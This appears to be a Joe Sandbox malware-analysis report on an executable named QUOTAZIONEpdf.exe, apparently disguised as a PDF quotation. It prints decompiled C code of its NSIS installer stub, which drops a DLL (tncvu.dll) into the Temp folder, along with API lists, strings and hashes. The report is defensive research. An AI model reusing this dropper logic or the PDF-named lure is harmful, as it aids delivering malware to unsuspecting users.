                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                • Instruction ID: f98c46a7d4a45b1e93054ee16d037c4b99b117d06cd84a33c86e8ff0b6c30e47
                • Opcode Fuzzy Hash: b8718c5171febd1f94c1c08a97aa2274874a9074e7d0b720a207e81be49f5868
                • Instruction Fuzzy Hash: 83F18771D00229CBDF18DFA8C8946ADBBB1FF44305F25816ED856BB281D3785A86CF44
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 614 405d7c-405d90 FindFirstFileA 615 405d92-405d9b FindClose 614->615 616 405d9d 614->616 617 405d9f-405da0 615->617 616->617
                C-Code - Quality: 100%
                			E00405D7C(CHAR* _a4) {
                				void* _t2;
                
                				_t2 = FindFirstFileA(_a4, 0x4224e8); // executed
                				if(_t2 == 0xffffffff) {
                					return 0;
                				}
                				FindClose(_t2);
                				return 0x4224e8;
                			}





                APIs
                • FindFirstFileA.KERNELBASE(?,004224E8,004218A0,0040569C,004218A0,004218A0,00000000,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405D87
                • FindClose.KERNEL32(00000000), ref: 00405D93
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Find$CloseFileFirst
                • String ID: $B
                • API String ID: 2295610775-2366330246
                • Opcode ID: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                • Instruction ID: 8877f450b99b184e504413f9ffa66f4d164bf9bd4a7d07bd52ad5b53af664480
                • Opcode Fuzzy Hash: faf9a5a1b02af36eb702065ba3c0ed1dca863e262e1f5f2ed0a66c6ec2a69bc9
                • Instruction Fuzzy Hash: 84D012319595306BC75127386D0C84B7A59DF15331750CA33F02AF22F0D3748C518AAD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405DA3(signed int _a4) {
                				struct HINSTANCE__* _t5;
                				CHAR* _t7;
                				signed int _t9;
                
                				_t9 = _a4 << 3;
                				_t7 =  *(_t9 + 0x409218);
                				_t5 = GetModuleHandleA(_t7);
                				if(_t5 != 0) {
                					L2:
                					return GetProcAddress(_t5,  *(_t9 + 0x40921c));
                				}
                				_t5 = LoadLibraryA(_t7); // executed
                				if(_t5 != 0) {
                					goto L2;
                				}
                				return _t5;
                			}







                APIs
                • GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                • LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                • GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: AddressHandleLibraryLoadModuleProc
                • String ID:
                • API String ID: 310444273-0
                • Opcode ID: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                • Instruction ID: 37252885b6730f192407f0687863edf929784b14cf5d3781349e011cb12c2895
                • Opcode Fuzzy Hash: dcb02677a219034efdab4e35853fb1e5d97da29e7b116a2417b6d6f34bb30324
                • Instruction Fuzzy Hash: F7E0C232A04610ABC6114B709D489BB77BCEFE9B41300897EF545F6290C734AC229FFA
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 108 4035e3-4035fb call 405da3 111 4035fd-40360d call 4059e3 108->111 112 40360f-403636 call 40596c 108->112 121 403659-403678 call 403897 call 405659 111->121 117 403638-403649 call 40596c 112->117 118 40364e-403654 lstrcatA 112->118 117->118 118->121 126 40367e-403683 121->126 127 4036ff-403707 call 405659 121->127 126->127 128 403685-4036a9 call 40596c 126->128 133 403715-40373a LoadImageA 127->133 134 403709-403710 call 405aa7 127->134 128->127 135 4036ab-4036ad 128->135 137 403740-403776 RegisterClassA 133->137 138 4037c9-4037d1 call 40140b 133->138 134->133 139 4036be-4036ca lstrlenA 135->139 140 4036af-4036bc call 4055a3 135->140 141 40377c-4037c4 SystemParametersInfoA CreateWindowExA 137->141 142 40388d 137->142 151 4037d3-4037d6 138->151 152 4037db-4037e6 call 403897 138->152 146 4036f2-4036fa call 405578 call 405a85 139->146 147 4036cc-4036da lstrcmpiA 139->147 140->139 141->138 144 40388f-403896 142->144 146->127 147->146 150 4036dc-4036e6 GetFileAttributesA 147->150 154 4036e8-4036ea 150->154 155 4036ec-4036ed call 4055bf 150->155 151->144 161 403864-40386c call 404ef5 152->161 162 4037e8-403805 ShowWindow LoadLibraryA 152->162 154->146 154->155 155->146 170 403886-403888 call 40140b 161->170 171 40386e-403874 161->171 163 403807-40380c LoadLibraryA 162->163 164 40380e-403820 GetClassInfoA 162->164 163->164 166 403822-403832 GetClassInfoA RegisterClassA 164->166 167 403838-403862 DialogBoxParamA call 40140b 164->167 166->167 167->144 170->142 171->151 173 40387a-403881 call 40140b 171->173 173->151
                C-Code - Quality: 96%
                			E004035E3() {
                				intOrPtr _v4;
                				intOrPtr _v8;
                				int _v12;
                				int _v16;
                				char _v20;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				intOrPtr* _t20;
                				void* _t28;
                				void* _t30;
                				int _t31;
                				void* _t34;
                				struct HINSTANCE__* _t37;
                				int _t38;
                				int _t42;
                				char _t61;
                				CHAR* _t63;
                				signed char _t67;
                				CHAR* _t78;
                				intOrPtr _t80;
                				CHAR* _t85;
                
                				_t80 =  *0x423eb0;
                				_t20 = E00405DA3(6);
                				_t87 = _t20;
                				if(_t20 == 0) {
                					_t78 = 0x420498;
                					"1033" = 0x7830;
                					E0040596C(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420498, 0);
                					__eflags =  *0x420498;
                					if(__eflags == 0) {
                						E0040596C(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x420498, 0);
                					}
                					lstrcatA("1033", _t78);
                				} else {
                					E004059E3("1033",  *_t20() & 0x0000ffff);
                				}
                				E00403897(_t75, _t87);
                				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
                				 *0x423f20 =  *0x423eb8 & 0x00000020;
                				if(E00405659(_t87, "C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
                					L16:
                					if(E00405659(_t95, _t84) == 0) {
                						E00405AA7(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                					}
                					_t28 = LoadImageA( *0x423ea0, 0x67, 1, 0, 0, 0x8040); // executed
                					 *0x423688 = _t28;
                					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                						L21:
                						if(E0040140B(0) == 0) {
                							_t30 = E00403897(_t75, __eflags);
                							__eflags =  *0x423f40;
                							if( *0x423f40 != 0) {
                								_t31 = E00404EF5(_t30, 0);
                								__eflags = _t31;
                								if(_t31 == 0) {
                									E0040140B(1);
                									goto L33;
                								}
                								__eflags =  *0x42366c;
                								if( *0x42366c == 0) {
                									E0040140B(2);
                								}
                								goto L22;
                							}
                							ShowWindow( *0x420470, 5);
                							_t37 = LoadLibraryA("RichEd20");
                							__eflags = _t37;
                							if(_t37 == 0) {
                								LoadLibraryA("RichEd32");
                							}
                							_t85 = "RichEdit20A";
                							_t38 = GetClassInfoA(0, _t85, 0x423640);
                							__eflags = _t38;
                							if(_t38 == 0) {
                								GetClassInfoA(0, "RichEdit", 0x423640);
                								 *0x423664 = _t85;
                								RegisterClassA(0x423640);
                							}
                							_t42 = DialogBoxParamA( *0x423ea0,  *0x423680 + 0x00000069 & 0x0000ffff, 0, E00403964, 0);
                							E0040140B(5);
                							return _t42;
                						}
                						L22:
                						_t34 = 2;
                						return _t34;
                					} else {
                						_t75 =  *0x423ea0;
                						 *0x423654 = _t28;
                						_v20 = 0x624e5f;
                						 *0x423644 = E00401000;
                						 *0x423650 =  *0x423ea0;
                						 *0x423664 =  &_v20;
                						if(RegisterClassA(0x423640) == 0) {
                							L33:
                							__eflags = 0;
                							return 0;
                						}
                						_t12 =  &_v16; // 0x624e5f
                						SystemParametersInfoA(0x30, 0, _t12, 0);
                						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                						goto L21;
                					}
                				} else {
                					_t75 =  *(_t80 + 0x48);
                					if(_t75 == 0) {
                						goto L16;
                					}
                					_t78 = 0x422e40;
                					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x423ed8, 0x422e40, 0);
                					_t61 =  *0x422e40; // 0x61
                					if(_t61 == 0) {
                						goto L16;
                					}
                					if(_t61 == 0x22) {
                						_t78 = 0x422e41;
                						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                					}
                					_t63 = lstrlenA(_t78) + _t78 - 4;
                					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                						L15:
                						E00405A85(_t84, E00405578(_t78));
                						goto L16;
                					} else {
                						_t67 = GetFileAttributesA(_t78);
                						if(_t67 == 0xffffffff) {
                							L14:
                							E004055BF(_t78);
                							goto L15;
                						}
                						_t95 = _t67 & 0x00000010;
                						if((_t67 & 0x00000010) != 0) {
                							goto L15;
                						}
                						goto L14;
                					}
                				}
                			}


























                APIs
                  • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                • lstrlenA.KERNEL32(afqfmqnwor,?,?,?,afqfmqnwor,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ), ref: 004036BF
                • lstrcmpiA.KERNEL32(?,.exe,afqfmqnwor,?,?,?,afqfmqnwor,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                • GetFileAttributesA.KERNEL32(afqfmqnwor), ref: 004036DD
                • LoadImageA.USER32 ref: 00403726
                  • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                • RegisterClassA.USER32 ref: 0040376D
                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                • CreateWindowExA.USER32 ref: 004037BE
                • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                • GetClassInfoA.USER32 ref: 0040381C
                • GetClassInfoA.USER32 ref: 00403829
                • RegisterClassA.USER32 ref: 00403832
                • DialogBoxParamA.USER32 ref: 00403851
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$afqfmqnwor
                • API String ID: 914957316-2403669375
                • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 196 402d0f-402d11 192->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 203 402d9d-402da1 199->203 204 402d1f-402d37 call 40571d 199->204 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 220 402e02-402e04 202->220 209 402da3-402da9 call 402bc5 203->209 210 402daa-402db0 203->210 204->210 223 402d39-402d40 204->223 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->197 225 402e0a-402e10 220->225 223->210 227 402d42-402d49 223->227 225->197 225->201 227->210 230 402d4b-402d52 227->230 228->182 236 402ead-402eb0 229->236 230->210 232 402d54-402d5b 230->232 232->210 235 402d5d-402d7d 232->235 235->197 237 402d83-402d87 235->237 236->197 238 402eb9-402eca 236->238 239 402d89-402d8d 237->239 240 402d8f-402d97 237->240 242 402ed2-402ed7 238->242 243 402ecc 238->243 239->189 239->240 240->210 241 402d99-402d9b 240->241 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                C-Code - Quality: 96%
                			E00402C5B(void* __eflags, signed int _a4) {
                				long _v8;
                				long _v12;
                				intOrPtr _v16;
                				long _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				signed int _v40;
                				char _v300;
                				signed int _t54;
                				void* _t57;
                				void* _t62;
                				intOrPtr _t65;
                				void* _t68;
                				intOrPtr* _t70;
                				intOrPtr _t71;
                				signed int _t77;
                				signed int _t82;
                				signed int _t83;
                				signed int _t89;
                				intOrPtr _t92;
                				signed int _t101;
                				signed int _t103;
                				void* _t105;
                				signed int _t106;
                				signed int _t109;
                				void* _t110;
                
                				_v8 = 0;
                				_v12 = 0;
                				 *0x423eac = GetTickCount() + 0x3e8;
                				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe", 0x400);
                				_t105 = E0040575C("C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe", 0x80000000, 3);
                				 *0x409010 = _t105;
                				if(_t105 == 0xffffffff) {
                					return "Error launching installer";
                				}
                				E00405A85("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe");
                				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\Desktop"));
                				_t54 = GetFileSize(_t105, 0);
                				__eflags = _t54;
                				 *0x41f048 = _t54;
                				_t109 = _t54;
                				if(_t54 <= 0) {
                					L22:
                					E00402BC5(1);
                					__eflags =  *0x423eb4;
                					if( *0x423eb4 == 0) {
                						goto L30;
                					}
                					__eflags = _v12;
                					if(_v12 == 0) {
                						L26:
                						_t57 = GlobalAlloc(0x40, _v20); // executed
                						_t110 = _t57;
                						E00405E7D(0x40afb0);
                						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                						__eflags = _t62 - 0xffffffff;
                						 *0x409014 = _t62;
                						if(_t62 != 0xffffffff) {
                							_t65 = E004031DA( *0x423eb4 + 0x1c);
                							 *0x41f04c = _t65;
                							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                							__eflags = _t68 - _v20;
                							if(_t68 == _v20) {
                								__eflags = _v40 & 0x00000001;
                								 *0x423eb0 = _t110;
                								 *0x423eb8 =  *_t110;
                								if((_v40 & 0x00000001) != 0) {
                									 *0x423ebc =  *0x423ebc + 1;
                									__eflags =  *0x423ebc;
                								}
                								_t45 = _t110 + 0x44; // 0x44
                								_t70 = _t45;
                								_t101 = 8;
                								do {
                									_t70 = _t70 - 8;
                									 *_t70 =  *_t70 + _t110;
                									_t101 = _t101 - 1;
                									__eflags = _t101;
                								} while (_t101 != 0);
                								_t71 =  *0x41703c; // 0x3d33f
                								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                								E0040571D(0x423ec0, _t110 + 4, 0x40);
                								__eflags = 0;
                								return 0;
                							}
                							goto L30;
                						}
                						return "Error writing temporary file. Make sure your temp folder is valid.";
                					}
                					E004031DA( *0x417038);
                					_t77 = E004031A8( &_a4, 4); // executed
                					__eflags = _t77;
                					if(_t77 == 0) {
                						goto L30;
                					}
                					__eflags = _v8 - _a4;
                					if(_v8 != _a4) {
                						goto L30;
                					}
                					goto L26;
                				} else {
                					do {
                						_t106 = _t109;
                						asm("sbb eax, eax");
                						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
                						__eflags = _t109 - _t82;
                						if(_t109 >= _t82) {
                							_t106 = _t82;
                						}
                						_t83 = E004031A8(0x417048, _t106); // executed
                						__eflags = _t83;
                						if(_t83 == 0) {
                							E00402BC5(1);
                							L30:
                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                						}
                						__eflags =  *0x423eb4;
                						if( *0x423eb4 != 0) {
                							__eflags = _a4 & 0x00000002;
                							if((_a4 & 0x00000002) == 0) {
                								E00402BC5(0);
                							}
                							goto L19;
                						}
                						E0040571D( &_v40, 0x417048, 0x1c);
                						_t89 = _v40;
                						__eflags = _t89 & 0xfffffff0;
                						if((_t89 & 0xfffffff0) != 0) {
                							goto L19;
                						}
                						__eflags = _v36 - 0xdeadbeef;
                						if(_v36 != 0xdeadbeef) {
                							goto L19;
                						}
                						__eflags = _v24 - 0x74736e49;
                						if(_v24 != 0x74736e49) {
                							goto L19;
                						}
                						__eflags = _v28 - 0x74666f73;
                						if(_v28 != 0x74666f73) {
                							goto L19;
                						}
                						__eflags = _v32 - 0x6c6c754e;
                						if(_v32 != 0x6c6c754e) {
                							goto L19;
                						}
                						_a4 = _a4 | _t89;
                						_t103 =  *0x417038; // 0x3114d
                						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                						_t92 = _v16;
                						__eflags = _t92 - _t109;
                						 *0x423eb4 = _t103;
                						if(_t92 > _t109) {
                							goto L30;
                						}
                						__eflags = _a4 & 0x00000008;
                						if((_a4 & 0x00000008) != 0) {
                							L15:
                							_v12 = _v12 + 1;
                							_t109 = _t92 - 4;
                							__eflags = _t106 - _t109;
                							if(_t106 > _t109) {
                								_t106 = _t109;
                							}
                							goto L19;
                						}
                						__eflags = _a4 & 0x00000004;
                						if((_a4 & 0x00000004) != 0) {
                							goto L22;
                						}
                						goto L15;
                						L19:
                						__eflags = _t109 -  *0x41f048; // 0x31e57
                						if(__eflags < 0) {
                							_v8 = E00405E0F(_v8, 0x417048, _t106);
                						}
                						 *0x417038 =  *0x417038 + _t106;
                						_t109 = _t109 - _t106;
                						__eflags = _t109;
                					} while (_t109 > 0);
                					goto L22;
                				}
                			}
































                APIs
                • GetTickCount.KERNEL32 ref: 00402C6F
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,00000400), ref: 00402C8B
                  • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 00405760
                  • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,C:\Users\user\Desktop\QUOTAZIONEpdf.exe,80000000,00000003), ref: 00402CD4
                • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                Strings
                • C:\Users\user\Desktop\QUOTAZIONEpdf.exe, xrefs: 00402C75, 00402C84, 00402C98, 00402CB5
                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5B, 00402E33
                • Null, xrefs: 00402D54
                • C:\Users\user\Desktop, xrefs: 00402CB6, 00402CBB, 00402CC1
                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E64
                • Error launching installer, xrefs: 00402CAB
                • soft, xrefs: 00402D4B
                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EB2
                • "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" , xrefs: 00402C68
                • Inst, xrefs: 00402D42
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QUOTAZIONEpdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                • API String ID: 2803837635-3063047783
                • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 342 4017a5-4017b7 334->342 343 401795-4017a3 CompareFileTime 334->343 336 4017c5-4017e1 call 40575c 335->336 337 4017bf-4017c0 call 40573d 335->337 345 4017e3-4017e6 336->345 346 401859-401882 call 404e23 call 402f01 336->346 337->336 342->335 343->342 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 358 401884-401888 346->358 359 40188a-401896 SetFileTime 346->359 347->333 380 401830-401831 347->380 360 40184e-401854 348->360 358->359 362 40189c-4018a7 FindCloseChangeNotification 358->362 359->362 363 402886 360->363 365 40287d-402880 362->365 366 4018ad-4018b0 362->366 367 402888-40288c 363->367 365->363 370 4018b2-4018c3 call 405aa7 lstrcatA 366->370 371 4018c5-4018c8 call 405aa7 366->371 377 4018cd-402205 call 405346 370->377 371->377 377->367 384 40264e-402655 377->384 380->360 382 401833-401834 380->382 382->348 384->365
                C-Code - Quality: 75%
                			E00401734(FILETIME* __ebx, void* __eflags) {
                				void* _t33;
                				void* _t41;
                				void* _t43;
                				FILETIME* _t49;
                				FILETIME* _t62;
                				void* _t64;
                				signed int _t70;
                				FILETIME* _t71;
                				FILETIME* _t75;
                				signed int _t77;
                				void* _t80;
                				CHAR* _t82;
                				void* _t85;
                
                				_t75 = __ebx;
                				_t82 = E004029E8(0x31);
                				 *(_t85 - 8) = _t82;
                				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                				_t33 = E004055E5(_t82);
                				_push(_t82);
                				if(_t33 == 0) {
                					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                				} else {
                					_push(0x409b68);
                					E00405A85();
                				}
                				E00405CE3(0x409b68);
                				while(1) {
                					__eflags =  *(_t85 + 8) - 3;
                					if( *(_t85 + 8) >= 3) {
                						_t64 = E00405D7C(0x409b68);
                						_t77 = 0;
                						__eflags = _t64 - _t75;
                						if(_t64 != _t75) {
                							_t71 = _t64 + 0x14;
                							__eflags = _t71;
                							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                						}
                						asm("sbb eax, eax");
                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                						__eflags = _t70;
                						 *(_t85 + 8) = _t70;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) == _t75) {
                						E0040573D(0x409b68);
                					}
                					__eflags =  *(_t85 + 8) - 1;
                					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                					__eflags = _t41 - 0xffffffff;
                					 *(_t85 - 0x34) = _t41;
                					if(_t41 != 0xffffffff) {
                						break;
                					}
                					__eflags =  *(_t85 + 8) - _t75;
                					if( *(_t85 + 8) != _t75) {
                						E00404E23(0xffffffe2,  *(_t85 - 8));
                						__eflags =  *(_t85 + 8) - 2;
                						if(__eflags == 0) {
                							 *((intOrPtr*)(_t85 - 4)) = 1;
                						}
                						L31:
                						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                						__eflags =  *0x423f28;
                						goto L32;
                					} else {
                						E00405A85(0x40a368, 0x424000);
                						E00405A85(0x424000, 0x409b68);
                						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp\\nsr3B6B.tmp\\tncvu.dll",  *((intOrPtr*)(_t85 - 0x10)));
                						E00405A85(0x424000, 0x40a368);
                						_t62 = E00405346("C:\\Users\\hardz\\AppData\\Local\\Temp\\nsr3B6B.tmp\\tncvu.dll",  *(_t85 - 0x24) >> 3) - 4;
                						__eflags = _t62;
                						if(_t62 == 0) {
                							continue;
                						} else {
